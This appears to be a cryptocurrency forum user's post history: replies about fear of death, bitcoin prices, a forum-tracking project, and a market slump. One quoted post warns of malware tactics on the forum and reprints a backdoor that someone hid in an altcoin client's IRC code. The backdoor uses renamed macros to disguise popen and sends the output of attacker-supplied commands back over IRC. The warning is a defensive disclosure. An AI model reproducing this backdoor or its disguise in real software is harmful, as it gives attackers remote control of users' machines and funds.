22  Other / Off-topic / Re: Are You Afraid To Die? on: December 02, 2018, 09:24:13 PM
I was just thinking back then, what if I die right now how the hell would it looked like? Although I keep saying that I'm not afraid but whenever I think of my wife I can't possibly die right now.

And whenever I think about my death i feel terrified for the reason I will be missing some moments here on Earth. Though its already impossible to live a Hundred years right now, I still want to see how this world change.
Am not Afraid but i feel terrified, silly isn't it?

How about you? Are you afraid on dying? Have you considered keeping yourself alive to see the future?

24  Economy / Speculation / Re: What's next for bitcoin on: November 28, 2018, 12:45:35 AM
I don't think it's very realistic, because etfs have a big impact on the whole cryptocurrency market right now.
So most people have regained confidence, so I think the bull market is coming.
i agree with this comment, this sounds realistc
25  Bitcoin / Project Development / Re: Announcing BPIP - The Bitcointalk Public Information Project! on: November 25, 2018, 11:16:42 PM
I am happy and proud to announce the official launch of the Bitcointalk Public Information Project!

This project aims to track and record all forum activity of all users.

We currently track the following:
- Full Merit History (updated every 60 seconds)
- Security/Mod log (updated every 60 seconds)
- All other profile info is updated on a dynamic schedule based on your recent activity.

Some features are not yet added, such as the ability to sort searches.  Additional pages such as Merit History will be added soon.

THIS PROJECT HAS JUST STARTED.  In the following weeks I will be adding real time tracking for Default Trust membership.  I also plan to let users add profiles to custom lists.  This will be useful if you want to (example) track profiles to not send merit to, or if you run a bounty campaign.

If you can think of anything else you would like to see tracked, please comment here or click on the SPONSOR link to contact me.

Very nice Project that sounds good,
26  Alternate cryptocurrencies / Altcoin Discussion / Re: Beware of Increasingly Sophisticated Malware Infection Attempts on: November 24, 2018, 02:08:03 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
OMG thank you for warning this kind of "hacking"

27  Alternate cryptocurrencies / Speculation (Altcoins) / Re: Crypto market in depression on: November 22, 2018, 03:35:16 PM
The crypto market is on a rapid downward spiral and almost all coins including so called good coins are down in prices. Is there any chances the market will recover? In my opinion, it takes the end of the year 2018 to recover the market. What are your views?
Maybe in early 2019 onr inte months of april or may we see that the market recovers, we will to have enough patience for it.
